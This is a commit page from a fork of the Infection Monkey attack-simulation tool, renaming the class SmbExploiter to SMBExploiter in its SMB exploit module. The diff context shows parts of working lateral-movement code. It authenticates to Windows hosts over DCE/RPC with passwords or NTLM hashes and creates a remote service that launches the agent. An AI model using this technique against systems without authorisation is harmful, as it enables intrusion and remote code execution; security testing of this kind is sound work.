p34709852
/
monkey
forked from p15670423/monkey
1
0
Fork 1
Code Issues Pull Requests Projects Releases Wiki Activity

Agent: Rename SmbExploiter SMBExploiter

This commit is contained in:
Mike Salvatore 2022-03-18 08:44:30 -04:00
parent 6fda2691e5
commit 396dd0fca6
1 changed files with 11 additions and 11 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

22
monkey/infection_monkey/exploit/smbexec.py
View File

@ -16,7 +16,7 @@ from infection_monkey.utils.commands import build_monkey_commandline
logger = getLogger(__name__) logger = getLogger(__name__)
class SmbExploiter(HostExploiter): class SMBExploiter(HostExploiter):
_TARGET_OS_TYPE = ["windows"] _TARGET_OS_TYPE = ["windows"]
_EXPLOITED_SERVICE = "SMB" _EXPLOITED_SERVICE = "SMB"
KNOWN_PROTOCOLS = { KNOWN_PROTOCOLS = {
@ -27,10 +27,10 @@ class SmbExploiter(HostExploiter):
SMB_SERVICE_NAME = "InfectionMonkey" SMB_SERVICE_NAME = "InfectionMonkey"
def __init__(self, host): def __init__(self, host):
super(SmbExploiter, self).__init__(host) super(SMBExploiter, self).__init__(host)
def is_os_supported(self): def is_os_supported(self):
if super(SmbExploiter, self).is_os_supported(): if super(SMBExploiter, self).is_os_supported():
return True return True
if not self.host.os.get("type"): if not self.host.os.get("type"):
@ -73,8 +73,8 @@ class SmbExploiter(HostExploiter):
self.add_vuln_port( self.add_vuln_port(
"%s or %s" "%s or %s"
% ( % (
SmbExploiter.KNOWN_PROTOCOLS["139/SMB"][1], SMBExploiter.KNOWN_PROTOCOLS["139/SMB"][1],
SmbExploiter.KNOWN_PROTOCOLS["445/SMB"][1], SMBExploiter.KNOWN_PROTOCOLS["445/SMB"][1],
) )
) )
exploited = True exploited = True
@ -109,14 +109,14 @@ class SmbExploiter(HostExploiter):
} + build_monkey_commandline(self.host, self.current_depth - 1) } + build_monkey_commandline(self.host, self.current_depth - 1)
smb_conn = False smb_conn = False
for str_bind_format, port in SmbExploiter.KNOWN_PROTOCOLS.values(): for str_bind_format, port in SMBExploiter.KNOWN_PROTOCOLS.values():
rpctransport = transport.DCERPCTransportFactory(str_bind_format % (self.host.ip_addr,)) rpctransport = transport.DCERPCTransportFactory(str_bind_format % (self.host.ip_addr,))
rpctransport.set_dport(port) rpctransport.set_dport(port)
rpctransport.setRemoteHost(self.host.ip_addr) rpctransport.setRemoteHost(self.host.ip_addr)
if hasattr(rpctransport, "set_credentials"): if hasattr(rpctransport, "set_credentials"):
# This method exists only for selected protocol sequences. # This method exists only for selected protocol sequences.
rpctransport.set_credentials(user, password, "", lm_hash, ntlm_hash, None) rpctransport.set_credentials(user, password, "", lm_hash, ntlm_hash, None)
rpctransport.set_kerberos(SmbExploiter.USE_KERBEROS) rpctransport.set_kerberos(SMBExploiter.USE_KERBEROS)
scmr_rpc = rpctransport.get_dce_rpc() scmr_rpc = rpctransport.get_dce_rpc()
@ -148,8 +148,8 @@ class SmbExploiter(HostExploiter):
resp = scmr.hRCreateServiceW( resp = scmr.hRCreateServiceW(
scmr_rpc, scmr_rpc,
sc_handle, sc_handle,
SmbExploiter.SMB_SERVICE_NAME, SMBExploiter.SMB_SERVICE_NAME,
SmbExploiter.SMB_SERVICE_NAME, SMBExploiter.SMB_SERVICE_NAME,
lpBinaryPathName=cmdline, lpBinaryPathName=cmdline,
) )
service = resp["lpServiceHandle"] service = resp["lpServiceHandle"]
@ -173,8 +173,8 @@ class SmbExploiter(HostExploiter):
self.add_vuln_port( self.add_vuln_port(
"%s or %s" "%s or %s"
% ( % (
SmbExploiter.KNOWN_PROTOCOLS["139/SMB"][1], SMBExploiter.KNOWN_PROTOCOLS["139/SMB"][1],
SmbExploiter.KNOWN_PROTOCOLS["445/SMB"][1], SMBExploiter.KNOWN_PROTOCOLS["445/SMB"][1],
) )
) )
return True return True